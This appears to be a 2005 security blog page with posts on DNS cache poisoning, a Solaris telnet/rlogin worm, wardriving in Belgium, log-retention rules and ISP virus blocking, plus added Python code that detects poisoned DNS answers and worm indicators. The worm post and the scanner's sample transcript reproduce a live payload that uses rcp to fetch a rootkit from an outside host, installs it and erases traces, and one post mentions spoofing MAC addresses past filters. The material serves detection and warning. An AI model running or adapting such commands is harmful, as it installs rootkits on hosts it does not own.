31-03-05

dns poisoning attacks go big-scale

why write a virus if you can change the IP address that every .com site resolves to for everyone who uses a certain DNS server, so that they land automatically on a site where spyware is loaded onto their PC?
well, that is what is happening now in the US
it is the first big-scale attack on commercial DNS servers, and one that is poisoning the whole of the traffic going to .com sites. It spreads because DNS servers depend on each other: a resolver caches the answers it receives, and a resolver that forwards its queries to a poisoned upstream resolver caches and hands out the same bogus records to its own clients.
 
what is more interesting is that it is a zero-day attack: no one has a clue how this is being done, the hackers are in control here
 
a few weeks ago everybody was laughing at an American who claimed in a new Dutch IT monthly that he could do just that; impossible, said the whole IT security industry
 
well, they have been doing it for a week now, going a step further each time
 
what can you do?
- set up your own DNS servers behind your firewall so you do not depend so much on others, or at least be able to switch external DNS servers quickly
- direct all DNS traffic from your network to those specific DNS servers and block the rest at the firewall
- just stop clicking yes on everything you see and receive
 
blocking these:
209.123.63.168 / 64.21.61.5 / 205.162.201.11
the malicious DNS server is 216.127.88.131
vparivalka .org
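Added example, not part of the original post or of the ISC diary it links to: a small Python parser for DNS response packets that applies two checks to whatever a resolver answers, first whether any answer points at one of the four addresses listed above, and second whether many unrelated names collapse onto a single address, which is what a poisoned .com zone looks like even before that address is on any blocklist. The packets are built by hand so the check runs offline; the example names, the 192.0.2.x addresses and the threshold of three names per address are assumptions of this example.

```python
import struct
import ipaddress

# Addresses named in the post: the three addresses it says to block and the
# malicious DNS server. Nothing here is looked up on the network; the responses
# below are constructed by hand so the check runs offline.
BLOCKED_IPS = {
    "209.123.63.168", "64.21.61.5", "205.162.201.11",  # blocked
    "216.127.88.131",                                   # malicious DNS server
}


def _read_name(data, offset):
    """Decode a DNS name at `offset`, following RFC 1035 compression pointers.
    Returns (dotted name, offset just past the name as it appears at `offset`)."""
    labels, end, jumped, hops = [], offset, False, 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:              # 2-byte pointer to an earlier name
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            jumped, hops = True, hops + 1
            if hops > 16:                      # a crafted packet can loop pointers
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:                        # root label terminates the name
            if not jumped:
                end = offset
            return ".".join(labels), end
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_answers(data):
    """Return [(name, ipv4)] for each A record in the answer section of a DNS response."""
    qdcount, ancount = struct.unpack("!HH", data[4:8])
    offset = 12                                # fixed 12-byte header
    for _ in range(qdcount):                   # skip the question section
        _, offset = _read_name(data, offset)
        offset += 4                            # QTYPE + QCLASS
    answers = []
    for _ in range(ancount):
        name, offset = _read_name(data, offset)
        rtype, rclass, _ttl, rdlength = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlength]
        offset += rdlength
        if rtype == 1 and rclass == 1 and rdlength == 4:   # A record, IN class
            answers.append((name, str(ipaddress.IPv4Address(rdata))))
    return answers


def poisoned_answers(answers, blocklist=BLOCKED_IPS):
    """Answers whose address is on the blocklist: the resolver handed out a poisoned record."""
    return [(name, ip) for name, ip in answers if ip in blocklist]


def collapsed_answers(answers, threshold=3):
    """Unrelated names that all resolve to one address. Three or more names on the same
    IP (assumed threshold) is the signature of a whole-zone poisoning."""
    by_ip = {}
    for name, ip in answers:
        by_ip.setdefault(ip, set()).add(name)
    return {ip: names for ip, names in by_ip.items() if len(names) >= threshold}


def build_response(qname, records):
    """Constructed test data: a minimal DNS response with one question and A answers.
    An answer for the queried name uses a compression pointer (0xC00C) to the question."""
    def encode(name):
        return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, len(records), 0, 0)
    question = encode(qname) + struct.pack("!HH", 1, 1)
    body = b""
    for name, ip in records:
        owner = b"\xC0\x0C" if name == qname else encode(name)
        body += owner + struct.pack("!HHIH", 1, 1, 300, 4) + ipaddress.IPv4Address(ip).packed
    return header + question + body


if __name__ == "__main__":
    # A resolver that answers a .com name with the malicious server's address.
    bad = build_response("www.example.com", [("www.example.com", "216.127.88.131")])
    print("poisoned:", poisoned_answers(parse_answers(bad)))
    many = [(n, "216.127.88.131") for n in ("a.com", "b.com", "c.com")] + [("d.com", "192.0.2.1")]
    print("collapsed:", collapsed_answers(many))
```

To use it against a live resolver you would send a query with `socket` to your own DNS server for a handful of unrelated .com names and feed each reply to `parse_answers`; the two checks are deliberately kept separate because an attacker's address changes faster than a blocklist, while the collapse of many names onto one address does not.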
 
thank god there is an Internet Storm Center
http://isc.sans.org/diary.php?date=2005-03-30
 

00:39 Posted by technology changes fast not a lot | Comments (0)

28-03-05

telnet worm attack against Solaris underway

it uses ports 23 (telnet) and 513 (rlogin) and brute-force password guessing
according to the Internet Storm Center, this is the data package to look out for: it creates a hidden staging directory /tmp/.m, writes a script mrun.sh that fetches the yatze rootkit tarball for the machine's architecture from 210.121.161.78 with rcp, unpacks it, runs the installer `go` from the rk directory and deletes the staging directory, and then launches that script in the background with nohup
 
mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp news@210.121.161.78:/usr/lib/.dl/rk/yatze-SunOS_`/usr/bin/uname -m`.tar . >mrun.sh
echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>mrun.sh
echo cd rk ; /bin/sh go >>mrun.sh
echo cd / ; rm -rf /tmp/.m/* ; rm -rf /tmp/.m >>mrun.sh
/usr/bin/nohup /bin/sh mrun.sh >/dev/null 2>/dev/null &
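Added example, not from the post or the ISC diary: a Python scanner that turns the payload above into indicators and runs them over a telnet session transcript (as a network sensor or a terminal-logging proxy would see it) and over a list of file paths from the host. The indicator values come from the payload; the indicator names, the sample transcript, the sample paths and the rule that two distinct indicators mean "compromised" are assumptions of this example.

```python
import re

# Indicators lifted from the payload quoted in the post. Everything else in this
# block (the sample session transcript especially) is constructed for the example.
INDICATORS = {
    "staging_dir":  re.compile(r"/tmp/\.m(?:/|\s|;|$)"),
    "dropper":      re.compile(r"\bmrun\.sh\b"),
    "rootkit_tar":  re.compile(r"yatze-SunOS_\S*\.tar"),
    "rcp_source":   re.compile(r"\brcp\b.*\b210\.121\.161\.78\b"),
    "remote_path":  re.compile(r"/usr/lib/\.dl/rk"),
    "nohup_launch": re.compile(r"nohup\s+/bin/sh\s+mrun\.sh"),
}


def scan_lines(lines):
    """Return [(line_no, [indicator names])] for each line matching at least one indicator."""
    hits = []
    for number, line in enumerate(lines, 1):
        names = [name for name, rx in INDICATORS.items() if rx.search(line)]
        if names:
            hits.append((number, names))
    return hits


def classify(hits, strong=2):
    """'compromised' when `strong` or more distinct indicators fire across the input,
    'suspicious' for a single one (a lone /tmp/.m could be legitimate), 'clean' otherwise."""
    seen = {name for _, names in hits for name in names}
    if len(seen) >= strong:
        return "compromised"
    return "suspicious" if seen else "clean"


def indicator_paths(paths):
    """Filesystem side of the same check: the staging directory and the rootkit drop
    directory the payload uses. `paths` is a list of absolute paths (e.g. from find)."""
    wanted = ("/tmp/.m", "/usr/lib/.dl")
    return sorted(p for p in paths if any(p == w or p.startswith(w + "/") for w in wanted))


# Constructed transcript of what a captured telnet session to a victim might contain.
SAMPLE_SESSION = [
    "login: news",
    "Password:",
    "$ uname -m",
    "sun4u",
    "$ mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp news@210.121.161.78:/usr/lib/.dl/rk/yatze-SunOS_sun4u.tar . >mrun.sh",
    "$ /usr/bin/nohup /bin/sh mrun.sh >/dev/null 2>/dev/null &",
    "$ exit",
]

if __name__ == "__main__":
    hits = scan_lines(SAMPLE_SESSION)
    for number, names in hits:
        print(f"line {number}: {', '.join(names)}")
    print("verdict:", classify(hits))
```

The transcript check only works because telnet and rlogin carry the session in clear text, which is the same property that lets the worm guess passwords over the wire; once logins move to SSH the host-side path check is the one that still applies, and note that the payload deletes /tmp/.m itself, so /usr/lib/.dl is the more durable indicator.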

 
if you still use telnet and rlogin, please consider upgrading to SSH (not PuTTY please) or another secured way to protect these logins
 
if you are compromised, pull your machine off the network; it can take some time before you know why they are doing this
more information about forensic methods is on securingit.tk
 

01:22 Posted by technology changes fast not a lot | Comments (0)

25-03-05

small mp3 players are an ecological disaster

I have a small mp3 player with very small batteries
well, I can't find rechargeable batteries or a charger for them
So I keep throwing away all those batteries, all of them
 
time that someone produces these

17:41 Posted by technology changes fast not a lot | Comments (0)

hacking the wireless way all through Belgium

http://www.wardrivemap.nl/mappoint/map.aspx?C=51.13956126...
 
wardriving through the power streets of Brussels
http://www.wardrivemap.nl/mappoint/map.aspx?C=50.84639022...
 
at this zoom level you will see the network IDs that are hackable (where the only protection is a MAC address filter, you only need a permitted MAC address, which you can spoof) when you pinpoint the access point
http://www.wardrivemap.nl/mappoint/map.aspx?C=50.85040390...
 
wireless, no wires, no security

17:33 Posted by technology changes fast not a lot | Comments (0)

log retention - the next frontier

these are the international laws and regulations you will have to comply with, even if you are not a US-based firm: having contacts with US institutions, citizens or firms is enough
 

It is also important to have someone knowledgeable of the relevant laws, regulations, and agreements which pertain to your site participate in policy creation and audits. Examples: VISA CISP, SOX, GLBA, FFIEC, Basel II, HIPAA, NISPOM, NERC, Italian Personal Data Protection Code Legislative Decree no. 196 of 30

The Basel II Accord - Affects international banks. Effective 2006. Activity logs should be retained 3-7 years

Federal Financial Institutions Examination Council (FFIEC) - Affects financial institutions governed by the Federal Reserve, FDIC, etc. Specifies historical retention.

Gramm-Leach-Bliley Act (GLBA) - Affects entities that participate in financial institution activities.

The Health Insurance Portability and Accountability Act (HIPAA) - Affects healthcare industry. Logs should be retained up to 6 years.

North American Electric Reliability Council (NERC) - Affects electric power providers. Specifies log retention for 6 months and audit record retention for 3 years.

National Industrial Security Program Operating Manual (NISPOM) - Specifies log retention of at least one year.

The Sarbanes-Oxley Act (SOX) - Affects US Corporations. Specifies retaining audit logs for up to seven years.

VISA Cardholder Information Security Program (CISP) - Specifies retaining audit logs for at least six months.

source: Internet Storm Center

Keeping logs safely is a very costly matter that should be studied very seriously if your organisation is a little bigger than 20 people

Even selecting what to log, and where, is a problem that can bring your whole system or network down, because logs can clog everything up very quickly


17:01 Posted by technology changes fast not a lot | Comments (0)

and you thought you understood open source

well, you thought you could do all kinds of stuff with it, but you didn't read the fine print or didn't see that there are different kinds of GPL licence and that the licence of a piece of software can change from version to version
well, then you can get into trouble like the firms listed here http://www.gpl-violations.org/
 
you thought it was free and easy?

16:21 Posted by technology changes fast not a lot | Comments (0)

belgium is the first to block viruses ISP-wise

Yes, we are a small country (one that hosts the European Commission, NATO and SHAPE, Euroclear and so on), and yes, it is something that will have to be built up stone by stone, and yes, it is first and foremost meant to hold off worm-based attacks and to protect the simple users who just want to do some surfing, banking and that kind of thing.
 
but if we believe the director of the Internet Storm Center, we are the first to put an internet watch center under the guidance of the regulator of the same industry, rather than some free-standing association without any clout, even if such associations can count on much goodwill.
 
The Belgian telecom law to be voted on in the Belgian federal parliament in the weeks to come will contain the obligation for ISPs to protect their networks and their users and to set up a Belgian Internet Storm Center. Thanks, Phillippe De Coene, for the courage and insight. Thanks for listening and acting. This is what political activism and these blogs are about: hoping that someday someone somewhere will change something for the better and that some ideas, or parts of them, can find their way. www.veiligecomputer.be
 
this means that if all goes well, Belgian PCs will have an antivirus and a firewall, that identified viruses will be stopped at the ISPs' gateways before they reach a PC, and that an internet storm watch center can bring all that know-how and goodwill together, so that two years from now we can say 'my mother worked on the internet and read all her mail and didn't get a virus'. Just like tap water.
manifest.skynetblogs.be   virusalerts.skynetblogs.be (2004, the comparison with the BIPT)
 
now, just one step to go and then the big work can begin
that day I will open a bottle of champagne

http://www.dekamer.be/kvvcr/showpage.cfm?section=|flwb|re...   (Dutch, the law)
 
Dutch article  http://www.zdnet.be/news.cfm?id=44288&mxp=88
 
an article with comments (Dutch)  http://www.security.nl/article/10439
 

16:15 Posted by technology changes fast not a lot | Comments (0)